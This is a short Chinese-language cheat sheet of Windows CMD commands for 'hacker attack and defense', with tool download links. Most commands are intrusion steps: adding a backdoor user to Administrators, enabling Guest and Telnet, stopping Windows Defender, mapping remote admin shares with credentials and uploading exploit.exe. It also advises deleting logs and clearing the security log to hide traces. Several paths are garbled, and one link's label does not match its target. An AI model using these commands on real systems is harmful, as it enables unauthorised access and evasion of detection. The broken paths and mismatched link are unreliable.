一、黑客攻防核心CMD命令集

1. 用户与权限管理

`net user heibai lovechina /add`（创建用户）

`net localgroup Administrators heibai /add`（提权至管理员组）

`net user guest /active:yes`（激活Guest账户）

`net start telnet`（开启Telnet服务）

`net stop "Windows Defender"`（停用安全服务）

2. 网络探测与连接

`netstat -ano`（查看开放端口及进程）

`nbtstat -A 192.168.1.1`（获取NetBIOS信息）

`net use z: 192.168.1.100c$ /user:admin password`（映射远程磁盘）

`net share c$ /del`（删除本地共享）

3. 端口扫描与漏洞探测

`nmap -sS -p 1-65535 192.168.1.1`（全端口SYN扫描）

`telnet 192.168.1.100 80`（手动测试端口连通性）

`arp -a`（查看ARP缓存表）

`tracert -d www.target.com`（追踪路由路径）

4. 文件与日志操作

`copy exploit.exe 192.168.1.100admin$`（上传文件至系统目录）

`del /F /Q C:logsaccess.log`（强制删除日志）

`systeminfo`（查看系统配置）

`tasklist /svc`（显示进程服务关联）

二、免费安全工具下载资源

1. 综合工具包

包含端口扫描、ARP欺骗、漏洞利用等工具，支持Windows环境。

下载地址：[CSDN资源库](https://m.ddooo.com/softdown/76687.htm)

集成Nmap、Metasploit、Wireshark等专业工具，适合高级渗透测试。

官网：[https://www.kali.org](https://www.kali.org)

2. 单点工具推荐

支持多种扫描模式（如SYN、FIN），识别操作系统及服务版本。

下载：[https://nmap.org](https://nmap.org)

实时抓包解析HTTP、DNS等协议，定位异常流量。

下载：[https://www.wireshark.org](https://www.wireshark.org)

支持字典/暴力破解，适用于弱口令检测。

下载：[OpenWall项目页](https://www.openwall.com/john/)

三、实战注意事项

1. 法律合规：所有操作需在授权环境中进行，禁止非法入侵。

2. 日志清理：使用`wevtutil cl security`清除安全日志，避免痕迹留存。

3. 防御对抗：通过`firewall.cpl`配置防火墙规则，限制高危端口访问。

四、扩展学习资源